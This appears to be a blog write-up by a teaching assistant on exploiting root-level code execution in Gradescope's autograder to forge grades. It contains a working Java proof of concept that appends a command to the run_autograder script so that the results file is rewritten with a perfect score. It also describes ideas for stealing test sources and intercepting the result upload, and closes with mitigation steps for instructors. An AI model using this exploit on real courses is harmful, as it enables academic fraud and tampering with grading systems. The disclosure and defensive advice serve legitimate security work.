So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.
Prologue
Gradescope is an online grading platform for schools, founded by an instructor at UC Berkeley, which has long been exposed with some security issues by guys from MIT as their final course project[1].
Me, on the other hand, just wanna realize my dream to hack my score when things hit me hard.
Now, although the MIT guys had already done a lot, including showing that we can directly read the source code of autograder and uploads it to a remote server (details on the paper, section 5.3.2, or down below). But they failed to achieve the final step, which obviously is to change one’s score freely.
Disclaimer
Now before you continue:
The following content and all associated programming code (“this work”) are written and developed under the notion for only educational and research purposes. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may result in breaking Gradescope’s Terms of Use, and may potentially violate your affiliation’s Code of Conduct. Under no circumstances should I be liable for any misuse of this work.
Details
First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:
The line in red indicates where our code will start running. Anything before this is totally uncontrollable without having an administrate privilege (being an instructor or have control over Gradescope’s server).
It seems that we have ruled out many potential options. However, due to the nature of Gradescope’s autograder, run_autograder
is executed with root permission. This means that anything that runs directly as a child process of run_autograder
owns root.
Our submitted code now has the root permission, and this opens up a whole new door towards arbitrary code execution.
Exploitation
With the power of root, we can literally traverse through all the files on the server (more specifically in Docker, without a sandbox escape exploit), and upload them to a remote server controlled by the user, since we also have Internet access.
Normies would stop here and say, “well we have the test cases just study them and debug your code.” ⒻⒶⒸⓉ, but not enough. As a TA myself, I tend to write large random fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.
Direct Output
The first thing comes to mind is to directly write to the output results.json
. Since the path to it is absolutely fixed (/autograder/results/results.json
), and we know the format of the output by the documentation. Seems that all we need to do is to write to the file directly and that’s it.
However, take a look at the flowchart and you will realize that the results.json
is written by the run_autograder
after the test is finished. This means whatever we wrote to the file would get overwritten by the real autograder results.
This seems to have an easy fix. After our code writes to the file, just set the file to immutable so that the real autograder cannot overwrite it. The problem here is, Docker by default runs without LINUX_IMMUTABLE
capability, so even if you set the file to be unwritable by anyone with chmod
, the file still can be overwritten.
This is a no-go.
Direct Submission
Following the path on the flow chart, the next thing meets my eye is the procedure where harness.py
would upload the result via an HTTP POST request. If Gradescope would automatically accept and parse the first result comes in, potentially it may ignore any following request.
Now the thing would be to send an HTTP request to the URL for submitting the result. Look into the source code of harness.py
, it turns out the URL is acquired from the environment variables. Everything seems to be going well, the user code can successfully get the URL from env, but the HTTP request simply is not OK.
A deeper look into source code showed that there needs to be an authentication token in the header along with the request. Although the token is acquired from the environment variables as well, Gradescope developers actually paid attention to this little detail and delete the environment variable after it is loaded. The result is that any child process of harness.py
would not be able to get that environment variable.
What a pity.
thoughts…
When writing this, it comes to me that we could spin up a fake web server that MITM the submission. We can set HOSTS for the URL to be a loopback address and make harness.py
hit our fake server, change the payload, and forward it to the real remote server.
A detail needs to be taken care of is that the URL uses HTTPS protocol, meaning that we have to generate a self-signed certificate and trust it locally. I’m not quite sure how Python’s HTTP library works and should it loads the cert in time or caches it. Nonetheless, this could potentially work.
Also, there could be other methods to extract the authentication token, such as dumping the memory of the running harness.py
script and do a search in it. But that could be way too hardcore for our script-kiddie oriented write-up here.
Bottleneck
We need to make sure results.json
is changed after the real results are being outputted, but before the results.json
is read and upload by harness.py
. Look at the flowchart this does not leave us much space. This also seems to be an impossible job—results.json
is written after our code finishes executing, but how could we do anything if our code is no longer running?
Naturally, we need some kind of delayed device, that would still work after our code exits. I tried cron
and sleep
, both of them are polling-based and need precise timing, doesn’t seem to work well in this scenario (maybe just bad luck for me).
thoughts…
When writing this, it comes to me that we can use inotify
-related utilities to watch for the change of the results.json
file, which turns the scenario into an interrupts-driven case. If fast enough, we may squeeze in the time between the run_autograder
writes the file and harness.py
reads the file to make the change.
A New Light
All hopes seem gone, although you might already notice the larger-in-size arrow in the flowchart. It is after the autograder result is written to results.json
, but before run_autograder
exits. it would be perfect if we can do something at this time, but how?
It can’t help but to think, can we make run_autograder
do things we want it to do? At first glance, this is implausible, as run_autograder
is written by the instructors and is there before our code starts running. This is true for almost all executables, since it is impossible to change the instruction of a running file (without considering some hardcore injection, that is). This is also why we can’t directly change harness.py
to make it do what we want.
But run_autograder
is an exception. Although in the documentation it says that run_autograder
could be any type of executables files, since the examples provided by Gradescope is written as a shell script, many autograders follows the path.
What’s wrong about shell scripts? Well, shell scripts are executed line by line, which means that if we append new lines to the script before it is finished, the new line would get executed. As run_autograder
also has a fixed path, it makes our life tremendously easier. What we are left to do is to append the commands we want it to execute to the end of the file, and that’s it.
The Final Payload
I decided to actually extract a python script to the /autograder/exploit.py
, and then append a single line python /autograder/exploit.py
to the end of run_autograder
. The following is the POC code I used for a Java autograder. I also tried with a Python autograder, which works fine as well. Other autograders, as long as they are using a shell script as run_autograder
file, theoretically should work as well.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;
public class Submission {
public static void question1() {
final String exploit = "import json\n" +
"with open('/autograder/results/results.json', 'w') as f:\n" +
" f.write('{\"score\": 100.0}')";
final Path exploitPath = Paths.get("/autograder/exploit.py");
if (Files.notExists(exploitPath)) {
final Path agPath = Paths.get("/autograder/run_autograder");
try {
Files.write(agPath, "\npython /autograder/exploit.py".getBytes(),
StandardOpenOption.APPEND);
Files.write(exploitPath, exploit.getBytes(),
StandardOpenOption.WRITE, StandardOpenOption.CREATE);
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
This is a POC exploit that overwrites the real autograder output and set the score to 100, which assumes Submission.question()
will be invoked somewhere during the tests.
Prevention
By the paper written by the MIT guys, this problem should exist back in 2016 when autograder was still in beta. Based on this I guess Gradescope developers are not going to fix it anytime soon.
Hence, the responsibility to prevent students from using this exploit to achieve perfect scores lays on the shoulder of our TAs.
The fix is rather easy:
-
Create a new user account, say
runner
, that is not in the sudoers.(e.g.
sudo adduser runner --no-create-home --disabled-password --gecos ""
) -
Set all the files and folders with sensitive data (
run_autograder
,results/
, source codes, etc.) to be inaccessible by other users. (e.g.chmod o= <file>
)However, make sure that the compiled executables or bytecode files (like
.class
for Java and.pyc
for Python), and all related files are still accessible by the other users. -
Then, when running test suites, run as the user
runner
.(e.g. before the line, add
sudo -u runner
)
And this should fix the problem.
This also prevents the student from seeing the source code. Although they could still upload the compiled files and decompile them, this should increase the difficulty a lot.
If your test suites do not need network access and stdouts, you could potentially kill them as well, so that your autograder would truly become a black box for any student-submitted code.
Epilogue
Honestly, Gradescope is lacking a lot of useful features that are considered essential for us TAs who use Gradescope for everything from homework to exams grading (like there’s even no mutually exclusive lock for grading). The situation is not any better after being acquired by TurnItIn.
If someday I’m tired of dealing with it, I’ll write a new online grading platform myself.